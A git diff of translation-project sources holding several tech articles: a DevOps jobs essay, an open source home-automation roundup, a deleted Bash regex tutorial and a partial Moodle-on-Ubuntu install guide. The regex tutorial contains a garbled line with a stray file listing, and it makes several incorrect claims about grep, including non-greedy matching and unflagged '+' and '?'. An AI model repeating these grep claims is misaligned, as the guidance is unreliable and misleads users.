via: https://www.howtoforge.com/tutorial/personal-backups-with-duplicati-on-linux/
|
||||
|
||||
作者:[][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.howtoforge.com
|
||||
[1]:https://updates.duplicati.com/beta/duplicati_2.0.2.1-1_all.deb
|
||||
[2]:https://www.debian.org/releases/stable/
|
||||
[3]:https://www.howtoforge.com/images/personal_backups_with_duplicati/installation-netstat.png
|
||||
[4]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/installation-netstat.png
|
||||
[5]:https://www.howtoforge.com/images/personal_backups_with_duplicati/installation-web.png
|
||||
[6]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/installation-web.png
|
||||
[7]:https://www.howtoforge.com/images/personal_backups_with_duplicati/create-1.png
|
||||
[8]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/create-1.png
|
||||
[9]:https://www.howtoforge.com/images/personal_backups_with_duplicati/create-2.png
|
||||
[10]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/create-2.png
|
||||
[11]:https://www.howtoforge.com/images/personal_backups_with_duplicati/create-3.png
|
||||
[12]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/create-3.png
|
||||
[13]:https://www.howtoforge.com/images/personal_backups_with_duplicati/create-4.png
|
||||
[14]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/create-4.png
|
||||
[15]:https://www.howtoforge.com/images/personal_backups_with_duplicati/create-5.png
|
||||
[16]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/create-5.png
|
||||
[17]:https://www.howtoforge.com/images/personal_backups_with_duplicati/create-6.png
|
||||
[18]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/create-6.png
|
||||
[19]:https://www.howtoforge.com/images/personal_backups_with_duplicati/create-7.png
|
||||
[20]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/create-7.png
|
||||
[21]:https://www.howtoforge.com/images/personal_backups_with_duplicati/create-8.png
|
||||
[22]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/create-8.png
|
||||
[23]:https://www.howtoforge.com/images/personal_backups_with_duplicati/run-1.png
|
||||
[24]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/run-1.png
|
||||
[25]:https://www.howtoforge.com/images/personal_backups_with_duplicati/restore-1.png
|
||||
[26]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/restore-1.png
|
||||
[27]:https://www.howtoforge.com/images/personal_backups_with_duplicati/restore-2.png
|
||||
[28]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/restore-2.png
|
||||
[29]:https://www.howtoforge.com/images/personal_backups_with_duplicati/remote-1.png
|
||||
[30]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/remote-1.png
|
||||
[31]:https://www.howtoforge.com/images/personal_backups_with_duplicati/remote-sshd.png
|
||||
[32]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/remote-sshd.png
|
||||
[33]:https://www.howtoforge.com/cdn-cgi/l/email-protection
|
||||
[34]:https://www.howtoforge.com/images/personal_backups_with_duplicati/remote-sshtun.png
|
||||
[35]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/remote-sshtun.png
|
||||
[36]:https://www.howtoforge.com/images/personal_backups_with_duplicati/db-1.png
|
||||
[37]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/db-1.png
|
||||
[38]:https://www.howtoforge.com/images/personal_backups_with_duplicati/db-2.png
|
||||
[39]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/db-2.png
|
||||
[40]:https://www.howtoforge.com/images/personal_backups_with_duplicati/db-4.png
|
||||
[41]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/db-4.png
|
||||
[42]:https://www.howtoforge.com/images/personal_backups_with_duplicati/db-5.png
|
||||
[43]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/db-5.png
|
||||
[44]:https://www.howtoforge.com/images/personal_backups_with_duplicati/db-6.png
|
||||
[45]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/db-6.png
|
||||
[46]:https://www.howtoforge.com/images/personal_backups_with_duplicati/db-7.png
|
||||
[47]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/db-7.png
|
||||
[48]:https://www.howtoforge.com/images/personal_backups_with_duplicati/db-8.png
|
||||
[49]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/db-8.png
|
58
sources/tech/20171213 Will DevOps steal my job-.md
Normal file
58
sources/tech/20171213 Will DevOps steal my job-.md
Normal file
@ -0,0 +1,58 @@
|
||||
Will DevOps steal my job?
|
||||
======
|
||||
|
||||
>Are you worried automation will replace people in the workplace? You may be right, but here's why that's not a bad thing.
|
||||
|
||||
![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/BIZ_question_B.png?itok=f88cyt00)
|
||||
>Image by : opensource.com
|
||||
|
||||
It's a common fear: Will DevOps be the end of my job? After all, DevOps means developers doing operations, right? DevOps is automation. What if I automate myself out of a job? Do continuous delivery and containers mean operations staff are obsolete? DevOps is all about coding: infrastructure-as-code and testing-as-code and this-or-that-as-code. What if I don't have the skill set to be a part of this?
|
||||
|
||||
[DevOps][1] is a looming change, disruptive in the field, with seemingly fanatical followers talking about changing the world with the [Three Ways][2]--the three underpinnings of DevOps--and the tearing down of walls. It can all be overwhelming. So what's it going to be--is DevOps going to steal my job?
|
||||
|
||||
### The first fear: I'm not needed
|
||||
|
||||
As developers managing the entire lifecycle of an application, it's all too easy to get caught up in the idea of DevOps. Containers are probably a big contributing factor to this line of thought. When containers exploded onto the scene, they were touted as a way for developers to build, test, and deploy their code all-in-one. What role does DevOps leave for the operations team, or testing, or QA?
|
||||
|
||||
This stems from a misunderstanding of the principles of DevOps. The first principle of DevOps, or the First Way, is _Systems Thinking_ , or placing emphasis on a holistic approach to managing and understanding the whole lifecycle of an application or service. This does not mean that the developers of the application learn and manage the whole process. Rather, it is the collaboration of talented and skilled individuals to ensure success as a whole. To make developers solely responsible for the process is practically the extreme opposite of this tenant--essentially the enshrining of a single silo with the importance of the entire lifecycle.
|
||||
|
||||
There is a place for specialization in DevOps. Just as the classically educated software engineer with knowledge of linear regression and binary search is wasted writing Ansible playbooks and Docker files, the highly skilled sysadmin with the knowledge of how to secure a system and optimize database performance is wasted writing CSS and designing user flows. The most effective group to write, test, and maintain an application is a cross-discipline, functional team of people with diverse skill sets and backgrounds.
|
||||
|
||||
### The second fear: My job will be automated
|
||||
|
||||
Accurate or not, DevOps can sometimes be seen as a synonym for automation. What work is left for operations staff and testing teams when automated builds, testing, deployment, monitoring, and notifications are a huge part of the application lifecycle? This focus on automation can be partially related to the Second Way: _Amplify Feedback Loops_. This second tenant of DevOps deals with prioritizing quick feedback between teams in the opposite direction an application takes to deployment --from monitoring and maintaining to deployment, testing, development, etc., and the emphasis to make the feedback important and actionable. While the Second Way is not specifically related to automation, many of the automation tools teams use within their deployment pipelines facilitate quick notification and quick action, or course-correction based on feedback in support of this tenant. Traditionally done by humans, it is easy to understand why a focus on automation might lead to anxiety about the future of one's job.
|
||||
|
||||
Automation is just a tool, not a replacement for people. Smart people trapped doing the same things over and over, pushing the big red George Jetson button are a wasted, untapped wealth of intelligence and creativity. Automation of the drudgery of daily work means more time to spend solving real problems and coming up with creative solutions. Humans are needed to figure out the "how and why;" computers can handle the "copy and paste."
|
||||
|
||||
There will be no end of repetitive, predictable things to automate, and automation frees teams to focus on higher-order tasks in their field. Monitoring teams, no longer spending all their time configuring alerts or managing trending configuration, can start to focus on predicting alarms, correlating statistics, and creating proactive solutions. Systems administrators, freed of scheduled patching or server configuration, can spend time focusing on fleet management, performance, and scaling. Unlike the striking images of factory floors and assembly lines totally devoid of humans, automated tasks in the DevOps world mean humans can focus on creative, rewarding tasks instead of mind-numbing drudgery.
|
||||
|
||||
### The third fear: I do not have the skillset for this
|
||||
|
||||
"How am I going to keep up with this? I don't know how to automate. Everything is code now--do I have to be a developer and write code for a living to work in DevOps?" The third fear is ultimately a fear of self-confidence. As the culture changes, yes, teams will be asked to change along with it, and some may fear they lack the skills to perform what their jobs will become.
|
||||
|
||||
Most folks, however, are probably already closer than they think. What is the Dockerfile, or configuration management like Puppet or Ansible, but environment as code? System administrators already write shell scripts and Python programs to handle repetitive tasks for them. It's hardly a stretch to learn a little more and begin using some of the tools already at their disposal to solve more problems--orchestration, deployment, maintenance-as-code--especially when freed from the drudgery of manual tasks to focus on growth.
|
||||
|
||||
The answer to this fear lies in the third tenant of DevOps, the Third Way: _A Culture of Continual Experimentation and Learning_. The ability to try and fail and learn from mistakes without blame is a major factor in creating ever-more creative solutions. The Third Way is empowered by the first two ways --allowing for for quick detection of and repair of problems, and just as the developer is free to try and learn, other teams are as well. Operations teams that have never used configuration management or written programs to automate infrastructure provisioning are free to try and learn. Testing and QA teams are free to implement new testing pipelines and automate approval and release processes. In a culture that embraces learning and growing, everyone has the freedom to acquire the skills they need to succeed at and enjoy their job.
|
||||
|
||||
### Conclusion
|
||||
|
||||
Any disruptive practice or change in an industry can create fear or uncertainty, and DevOps is no exception. A concern for one's job is a reasonable response to the hundreds of articles and presentations enumerating the countless practices and technologies seemingly dedicated to empowering developers to take responsibility for every aspect of the industry.
|
||||
|
||||
In truth, however, DevOps is "[a cross-disciplinary community of practice dedicated to the study of building, evolving, and operating rapidly changing resilient systems at scale][3]." DevOps means the end of silos, but not specialization. It is the delegation of drudgery to automated systems, freeing you to do what people do best: think and imagine. And if you're motivated to learn and grow, there will be no end of opportunities to solve new and challenging problems.
|
||||
|
||||
Will DevOps take away your job? Yes, but it will give you a better one.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://opensource.com/article/17/12/will-devops-steal-my-job
|
||||
|
||||
作者:[Chris Collins][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://opensource.com/users/clcollins
|
||||
[1]:https://opensource.com/resources/devops
|
||||
[2]:http://itrevolution.com/the-three-ways-principles-underpinning-devops/
|
||||
[3]:https://theagileadmin.com/what-is-devops/
|
118
sources/tech/20171214 6 open source home automation tools.md
Normal file
118
sources/tech/20171214 6 open source home automation tools.md
Normal file
@ -0,0 +1,118 @@
|
||||
6 open source home automation tools
|
||||
======
|
||||
|
||||
![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/osdc_520x292_openlightbulbs.png?itok=nrv9hgnH)
|
||||
|
||||
The [Internet of Things][13] isn't just a buzzword, it's a reality that's expanded rapidly since we last published a review article on home automation tools in 2016\. In 2017, [26.5% of U.S. households][14] already had some type of smart home technology in use; within five years that percentage is expected to double.
|
||||
|
||||
With an ever-expanding number of devices available to help you automate, protect, and monitor your home, it has never been easier nor more tempting to try your hand at home automation. Whether you're looking to control your HVAC system remotely, integrate a home theater, protect your home from theft, fire, or other threats, reduce your energy usage, or just control a few lights, there are countless devices available at your disposal.
|
||||
|
||||
But at the same time, many users worry about the security and privacy implications of bringing new devices into their homes—a very real and [serious consideration][15]. They want to control who has access to the vital systems that control their appliances and record every moment of their everyday lives. And understandably so: In an era when even your refrigerator may now be a smart device, don't you want to know if your fridge is phoning home? Wouldn't you want some basic assurance that, even if you give a device permission to communicate externally, it is only accessible to those who are explicitly authorized?
|
||||
|
||||
[Security concerns][16] are among the many reasons why open source will be critical to our future with connected devices. Being able to fully understand the programs that control your home means you can view, and if necessary modify, the source code running on the devices themselves.
|
||||
|
||||
While connected devices often contain proprietary components, a good first step in bringing open source into your home automation system is to ensure that the device that ties your devices together—and presents you with an interface to them (the "hub")—is open source. Fortunately, there are many choices out there, with options to run on everything from your always-on personal computer to a Raspberry Pi.
|
||||
|
||||
Here are just a few of our favorites.
|
||||
|
||||
### Calaos
|
||||
|
||||
[Calaos][17] is designed as a full-stack home automation platform, including a server application, touchscreen interface, web application, native mobile applications for iOS and Android, and a preconfigured Linux operating system to run underneath. The Calaos project emerged from a French company, so its support forums are primarily in French, although most of the instructional material and documentation have been translated into English.
|
||||
|
||||
Calaos is licensed under version 3 of the [GPL][18] and you can view its source on [GitHub][19].
|
||||
|
||||
### Domoticz
|
||||
|
||||
[Domoticz][20] is a home automation system with a pretty wide library of supported devices, ranging from weather stations to smoke detectors to remote controls, and a large number of additional third-party [integrations][21] are documented on the project's website. It is designed with an HTML5 frontend, making it accessible from desktop browsers and most modern smartphones, and is lightweight, running on many low-power devices like the Raspberry Pi.
|
||||
|
||||
Domoticz is written primarily in C/C++ under the [GPLv3][22], and its [source code][23] can be browsed on GitHub.
|
||||
|
||||
### Home Assistant
|
||||
|
||||
[Home Assistant][24] is an open source home automation platform designed to be easily deployed on almost any machine that can run Python 3, from a Raspberry Pi to a network-attached storage (NAS) device, and it even ships with a Docker container to make deploying on other systems a breeze. It integrates with a large number of open source as well as commercial offerings, allowing you to link, for example, IFTTT, weather information, or your Amazon Echo device, to control hardware from locks to lights.
|
||||
|
||||
Home Assistant is released under an [MIT license][25], and its source can be downloaded from [GitHub][26].
|
||||
|
||||
### MisterHouse
|
||||
|
||||
[MisterHouse][27] has gained a lot of ground since 2016, when we mentioned it as "another option to consider" on this list. It uses Perl scripts to monitor anything that can be queried by a computer or control anything capable of being remote controlled. It responds to voice commands, time of day, weather, location, and other events to turn on the lights, wake you up, record your favorite TV show, announce phone callers, warn that your front door is open, report how long your son has been online, tell you if your daughter's car is speeding, and much more. It runs on Linux, macOS, and Windows computers and can read/write from a wide variety of devices including security systems, weather stations, caller ID, routers, vehicle location systems, and more
|
||||
|
||||
MisterHouse is licensed under the [GPLv2][28] and you can view its source code on [GitHub][29].
|
||||
|
||||
### OpenHAB
|
||||
|
||||
[OpenHAB][30] (short for Open Home Automation Bus) is one of the best-known home automation tools among open source enthusiasts, with a large user community and quite a number of supported devices and integrations. Written in Java, openHAB is portable across most major operating systems and even runs nicely on the Raspberry Pi. Supporting hundreds of devices, openHAB is designed to be device-agnostic while making it easier for developers to add their own devices or plugins to the system. OpenHAB also ships iOS and Android apps for device control, as well as design tools so you can create your own UI for your home system.
|
||||
|
||||
You can find openHAB's [source code][31] on GitHub licensed under the [Eclipse Public License][32].
|
||||
|
||||
### OpenMotics
|
||||
|
||||
[OpenMotics][33] is a home automation system with both hardware and software under open source licenses. It's designed to provide a comprehensive system for controlling devices, rather than stitching together many devices from different providers. Unlike many of the other systems designed primarily for easy retrofitting, OpenMotics focuses on a hardwired solution. For more, see our [full article][34] from OpenMotics backend developer Frederick Ryckbosch.
|
||||
|
||||
The source code for OpenMotics is licensed under the [GPLv2][35] and is available for download on [GitHub][36].
|
||||
|
||||
These aren't the only options available, of course. Many home automation enthusiasts go with a different solution, or even decide to roll their own. Other users choose to use individual smart home devices without integrating them into a single comprehensive system.
|
||||
|
||||
If the solutions above don't meet your needs, here are some potential alternatives to consider:
|
||||
|
||||
* [EventGhost][1] is an open source ([GPL v2][2]) home theater automation tool that operates only on Microsoft Windows PCs. It allows users to control media PCs and attached hardware by using plugins that trigger macros or by writing custom Python scripts.
|
||||
|
||||
* [ioBroker][3] is a JavaScript-based IoT platform that can control lights, locks, thermostats, media, webcams, and more. It will run on any hardware that runs Node.js, including Windows, Linux, and macOS, and is open sourced under the [MIT license][4].
|
||||
|
||||
* [Jeedom][5] is a home automation platform comprised of open source software ([GPL v2][6]) to control lights, locks, media, and more. It includes a mobile app (Android and iOS) and operates on Linux PCs; the company also sells hubs that it says provide a ready-to-use solution for setting up home automation.
|
||||
|
||||
* [LinuxMCE][7] bills itself as the "'digital glue' between your media and all of your electrical appliances." It runs on Linux (including Raspberry Pi), is released under the Pluto open source [license][8], and can be used for home security, telecom (VoIP and voice mail), A/V equipment, home automation, and—uniquely—to play video games.
|
||||
|
||||
* [OpenNetHome][9], like the other solutions in this category, is open source software for controlling lights, alarms, appliances, etc. It's based on Java and Apache Maven, operates on Windows, macOS, and Linux—including Raspberry Pi, and is released under [GPLv3][10].
|
||||
|
||||
* [Smarthomatic][11] is an open source home automation framework that concentrates on hardware devices and software, rather than user interfaces. Licensed under [GPLv3][12], it's used for things such as controlling lights, appliances, and air humidity, measuring ambient temperature, and remembering to water your plants.
|
||||
|
||||
Now it's your turn: Do you already have an open source home automation system in place? Or perhaps you're researching the options to create one. What advice would you have to a newcomer to home automation, and what system or systems would you recommend?
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://opensource.com/life/17/12/home-automation-tools
|
||||
|
||||
作者:[Jason Baker][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://opensource.com/users/jason-baker
|
||||
[1]:http://www.eventghost.net/
|
||||
[2]:http://www.gnu.org/licenses/old-licenses/gpl-2.0.html
|
||||
[3]:http://iobroker.net/
|
||||
[4]:https://github.com/ioBroker/ioBroker#license
|
||||
[5]:https://www.jeedom.com/site/en/index.html
|
||||
[6]:http://www.gnu.org/licenses/old-licenses/gpl-2.0.html
|
||||
[7]:http://www.linuxmce.com/
|
||||
[8]:http://wiki.linuxmce.org/index.php/License
|
||||
[9]:http://opennethome.org/
|
||||
[10]:https://github.com/NetHome/NetHomeServer/blob/master/LICENSE
|
||||
[11]:https://www.smarthomatic.org/
|
||||
[12]:https://github.com/breaker27/smarthomatic/blob/develop/GPL3.txt
|
||||
[13]:https://opensource.com/resources/internet-of-things
|
||||
[14]:https://www.statista.com/outlook/279/109/smart-home/united-states
|
||||
[15]:http://www.crn.com/slide-shows/internet-of-things/300089496/black-hat-2017-9-iot-security-threats-to-watch.htm
|
||||
[16]:https://opensource.com/business/15/5/why-open-source-means-stronger-security
|
||||
[17]:https://calaos.fr/en/
|
||||
[18]:https://github.com/calaos/calaos-os/blob/master/LICENSE
|
||||
[19]:https://github.com/calaos
|
||||
[20]:https://domoticz.com/
|
||||
[21]:https://www.domoticz.com/wiki/Integrations_and_Protocols
|
||||
[22]:https://github.com/domoticz/domoticz/blob/master/License.txt
|
||||
[23]:https://github.com/domoticz/domoticz
|
||||
[24]:https://home-assistant.io/
|
||||
[25]:https://github.com/home-assistant/home-assistant/blob/dev/LICENSE.md
|
||||
[26]:https://github.com/balloob/home-assistant
|
||||
[27]:http://misterhouse.sourceforge.net/
|
||||
[28]:http://www.gnu.org/licenses/old-licenses/gpl-2.0.en.html
|
||||
[29]:https://github.com/hollie/misterhouse
|
||||
[30]:http://www.openhab.org/
|
||||
[31]:https://github.com/openhab/openhab
|
||||
[32]:https://github.com/openhab/openhab/blob/master/LICENSE.TXT
|
||||
[33]:https://www.openmotics.com/
|
||||
[34]:https://opensource.com/life/14/12/open-source-home-automation-system-opemmotics
|
||||
[35]:http://www.gnu.org/licenses/old-licenses/gpl-2.0.en.html
|
||||
[36]:https://github.com/openmotics
|
@ -1,148 +0,0 @@
|
||||
translating by kimii
|
||||
Bash Scripting: Learn to use REGEX (Basics)
|
||||
======
|
||||
Regular expressions or regex or regexp are basically strings of character that define a search pattern, they can be used for performing 'Search' or 'Search & Replace' operations as well as can be used to validate a condition like password policy etc.
|
||||
|
||||
Regex is a very powerful tool that is available at our disposal & best thing about using regex is that they can be used in almost every computer language. So if you are Bash Scripting or creating a Python program, we can use regex or we can also write a single line search query.
|
||||
|
||||
For this tutorial, we are going to learn some of regex basics concepts & how we can use them in Bash using 'grep', but if you wish to use them on other languages like python or C, you can just use the regex part. So let's start by showing an example for regex,
|
||||
|
||||
**Ex-** A regex looks like
|
||||
|
||||
**/t[aeiou]l/**
|
||||
|
||||
But what does this mean. It means that the mentioned regex is going to look for a word that starts with 't' , have any of the letters 'a e I o u ' in the middle & letter 'l' as the last word . It can be 'tel' 'tal' or 'til' / Match can be a separate word or part of another word like 'tilt', 'brutal' or 'telephone'.
|
||||
|
||||
**Syntax for using regex with grep is**
|
||||
|
||||
**$ grep "regex_search_term" file_location**
|
||||
|
||||
Don't worry if its getting over the mind, this was just an example to show what can be achieved with regex & believe me this was simplest of the example. We can achieve much much more from regex. We will now start regex with basics.
|
||||
|
||||
**(Recommended Read: [Useful Linux Commands that you should know ][1])**
|
||||
|
||||
## **Regex Basics**
|
||||
|
||||
We will now start learning about some special characters that are known as MetaCharacters. They help us in creating more complex regex search term. Mentioned below is the list of basic metacharacters,
|
||||
|
||||
**. or Dot** will match any character
|
||||
|
||||
**[ ]** will match a range of characters
|
||||
|
||||
**[^ ]** will match all character except for the one mentioned in braces
|
||||
|
||||
***** will match zero or more of the preceding items
|
||||
|
||||
**+** will match one or more of the preceding items
|
||||
|
||||
**? ** will match zero or one of the preceding items
|
||||
|
||||
**{n}** will match 'n' numbers of preceding items
|
||||
|
||||
**{n,}** will match 'n' number of or more of preceding items
|
||||
|
||||
**{n m} ** will match between 'n' & 'm' number of items
|
||||
|
||||
**{ ,m}** will match less than or equal to m number of items
|
||||
|
||||
**\ ** is an escape character, used when we need to include one of the metcharacters is our search.
|
||||
|
||||
We will now discuss all these metacharatcters with examples.
|
||||
|
||||
### **. or Dot**
|
||||
|
||||
Its used to match any character that occurs in our search term. For example, we can use dot like
|
||||
|
||||
**$ grep "d.g" file1**
|
||||
|
||||
This regex means we are looking for a word that starts with 'd', ends with 'g' & can have any character in the middle in the file named 'file_name'. Similarly we can use dot character any number of times for our search pattern, like
|
||||
|
||||
**T ……h**
|
||||
|
||||
This search term will look for a word that starts with 'T', ends with 'h' & can have any six characters in the middle.
|
||||
|
||||
### **[ ]**
|
||||
|
||||
Square braces are used to define a range of characters. For example, we need to search for some words in particular rather than matching any character,
|
||||
|
||||
**$ grep "N[oen]n" file2**
|
||||
|
||||
here, we are looking for a word that starts with 'N', ends with 'n' & can only have either of 'o' or 'e' or 'n' in the middle . We can mention from a single to any number of characters inside the square braces.
|
||||
|
||||
We can also define ranges like 'a-e' or '1-18' as the list of matching characters inside square braces.
|
||||
|
||||
### **[^ ]**
|
||||
|
||||
This is like the not operator for regex. While using [^ ], it means that our search will include all the characters except the ones mentioned inside the square braces. Example,
|
||||
|
||||
**$ grep "St[^1-9]d" file3**
|
||||
|
||||
This means that we can have all the words that starts with 'St' , ends with letter 'd' & must not contain any number from 1 to 9.
|
||||
|
||||
Now up until now we were only using examples of regex that only need to look for single character in middle but what if we need to look to more than that. Let's say we need to locate all words that starts & ends with a character & can have any number of characters in the middle. That's where we use multiplier metacharacters i.e. + 20171202 docker - Use multi-stage builds.md comic core.md Dict.md lctt2014.md lctt2016.md LCTT翻译规范.md LICENSE published README.md sign.md sources translated 选题模板.txt 中文排版指北.md & ?.
|
||||
|
||||
{n}, {n. m}, {n , } or { ,m} are also some other multipliers metacharacters that we can use in our regex terms.
|
||||
|
||||
### * (asterisk)
|
||||
|
||||
The following example matches any number of occurrences of the letter k, including none:
|
||||
|
||||
**$ grep "lak*" file4**
|
||||
|
||||
it means we can have a match with 'lake' or 'la' or 'lakkkkk'
|
||||
|
||||
### +
|
||||
|
||||
The following pattern requires that at least one occurrence of the letter k in the string be matched:
|
||||
|
||||
**$ grep "lak+" file5**
|
||||
|
||||
here, k at least should occur once in our search, so our results can be 'lake' or 'lakkkkk' but not 'la'.
|
||||
|
||||
|
||||
### **?**
|
||||
|
||||
In the following pattern matches
|
||||
|
||||
**$ grep "ba?b" file6**
|
||||
|
||||
the string bb or bab as with '?' multiplier we can have one or zero occurrence of the character.
|
||||
|
||||
### **Very important Note:**
|
||||
|
||||
This is pretty important while using multipliers, suppose we have a regex
|
||||
|
||||
**$ grep "S.*l" file7**
|
||||
|
||||
And we get results with 'small' , silly & than we also got 'Shane is a little to play ball'. But why did we get 'Shane is a little to play ball', we were only looking to words in our search so why did we get the complete sentence as our output.
|
||||
|
||||
That's because it satisfies our search criteria, it starts with letter 'S', has any number of characters in the middle & ends with letter 'l'. So what can we do to correct our regex, so that we only get words instead of whole sentences as our output.
|
||||
|
||||
We need to add ? Meta character in the regex,
|
||||
|
||||
**$ grep "S.*?l" file7**
|
||||
|
||||
This will correct the behavior of our regex.
|
||||
|
||||
### **\ or Escape characters**
|
||||
|
||||
\ is used when we need to include a character that is a metacharacter or has special meaning to regex. For example, we need to locate all the words ending with dot, so we can use
|
||||
|
||||
**$ grep "S.*\\." file8**
|
||||
|
||||
This will search and match all the words that ends with a dot character.
|
||||
|
||||
We now have some basic idea of how the regex works with this regex basics tutorial. In our next tutorial, we will learn some advance concepts of regex. In meanwhile practice as much as you can, create regex and try to en-corporate them in your work as much as you can. & if having any queries or questions you can leave them in the comments below.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: http://linuxtechlab.com/bash-scripting-learn-use-regex-basics/
|
||||
|
||||
作者:[SHUSAIN][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:http://linuxtechlab.com/author/shsuain/
|
||||
[1]:http://linuxtechlab.com/useful-linux-commands-you-should-know/
|
173
sources/tech/20171214 How to Install Moodle on Ubuntu 16.04.md
Normal file
173
sources/tech/20171214 How to Install Moodle on Ubuntu 16.04.md
Normal file
@ -0,0 +1,173 @@
|
||||
How to Install Moodle on Ubuntu 16.04
|
||||
======
|
||||
![How to Install Moodle on Ubuntu 16.04][1]
|
||||
|
||||
Step-by-step Installation Guide on how to Install Moodle on Ubuntu 16.04. Moodle (acronym of Modular-object-oriented dynamic learning environment') is a free and open source learning management system built to provide teachers, students and administrators single personalized learning environment. Moodle is built by the Moodle project which is led and coordinated by [Moodle HQ][2]
|
||||
|
||||
,
|
||||
|
||||
**Moodle comes with a lot of useful features such as:**
|
||||
|
||||
* Modern and easy to use interface
|
||||
* Personalised Dashboard
|
||||
* Collaborative tools and activities
|
||||
* All-in-one calendar
|
||||
* Simple text editor
|
||||
* Track progress
|
||||
* Notifications
|
||||
* and many more…
|
||||
|
||||
|
||||
|
||||
In this tutorial we will guide you through the steps of installing the latest version of Moodle on an Ubuntu 16.04 VPS with Apache web server, MySQL and PHP 7.
|
||||
|
||||
### 1. Login via SSH
|
||||
|
||||
First of all, login to your Ubuntu 16.04 VPS via SSH as user root
|
||||
|
||||
### 2. Update the OS Packages
|
||||
|
||||
Run the following command to update the OS packages and install some dependencies
|
||||
```
|
||||
apt-get update && apt-get upgrade
|
||||
apt-get install git-core graphviz aspell
|
||||
```
|
||||
|
||||
### 3. Install Apache Web Server
|
||||
|
||||
Install Apache web server from the Ubuntu repository
|
||||
```
|
||||
apt-get install apache2
|
||||
```
|
||||
|
||||
### 4. Start Apache Web Server
|
||||
|
||||
Once it is installed, start Apache and enable it to start automatically upon system boot
|
||||
```
|
||||
systemctl enable apache2
|
||||
```
|
||||
|
||||
### 5. Install PHP 7
|
||||
|
||||
Next, we will install PHP 7 and some additional PHP modules required by Moodle
|
||||
```
|
||||
apt-get install php7.0 libapache2-mod-php7.0 php7.0-pspell php7.0-curl php7.0-gd php7.0-intl php7.0-mysql php7.0-xml php7.0-xmlrpc php7.0-ldap php7.0-zip
|
||||
```
|
||||
|
||||
### 6. Install and Configure MySQL Database Server
|
||||
|
||||
Moodle stores most of its data in a database, so we will install MySQL database server
|
||||
```
|
||||
apt-get install mysql-client mysql-server
|
||||
```
|
||||
|
||||
After the installation, run the `mysql_secure_installation` script to set your MySQL root password and secure your MySQL installation.
|
||||
|
||||
Login to the MySQL server as user root and create a user and database for the Moodle installation
|
||||
```
|
||||
mysql -u root -p
|
||||
mysql> CREATE DATABASE moodle;
|
||||
mysql> GRANT ALL PRIVILEGES ON moodle.* TO 'moodleuser'@'localhost' IDENTIFIED BY 'PASSWORD';
|
||||
mysql> FLUSH PRIVILEGES;
|
||||
mysql> \q
|
||||
```
|
||||
|
||||
Don't forget to replace 'PASSWORD' with an actual strong password.
|
||||
|
||||
### 7. Get Moodle from GitHub repository
|
||||
|
||||
Next, change the current working directory and clone Moodle from their official GitHub repository
|
||||
```
|
||||
cd /var/www/html/
|
||||
git clone https://github.com/moodle/moodle.git
|
||||
```
|
||||
|
||||
Go to the '/moodle' directory and check all available branches
|
||||
```
|
||||
cd moodle/
|
||||
git branch -a
|
||||
```
|
||||
|
||||
Select the latest stable version (currently it is MOODLE_34_STABLE) and run the following command to tell git which branch to track or use
|
||||
```
|
||||
git branch --track MOODLE_34_STABLE origin/MOODLE_34_STABLE
|
||||
```
|
||||
|
||||
and checkout the specified version
|
||||
```
|
||||
git checkout MOODLE_34_STABLE
|
||||
|
||||
Switched to branch 'MOODLE_34_STABLE'
|
||||
Your branch is up-to-date with 'origin/MOODLE_34_STABLE'.
|
||||
```
|
||||
|
||||
Create a directory for the Moodle data
|
||||
```
|
||||
mkdir /var/moodledata
|
||||
```
|
||||
|
||||
Set the correct ownership and permissions
|
||||
```
|
||||
chown -R www-data:www-data /var/www/html/moodle
|
||||
chown www-data:www-data /var/moodledata
|
||||
```
|
||||
|
||||
### 8. Configure Apache Web Server
|
||||
|
||||
Create Apache virtual host for your domain name with the following content
|
||||
```
|
||||
nano /etc/apache2/sites-available/yourdomain.com.conf
|
||||
|
||||
ServerAdmin admin@yourdomain.com
|
||||
DocumentRoot /var/www/html/moodle
|
||||
ServerName yourdomain.com
|
||||
ServerAlias www.yourdomain.com
|
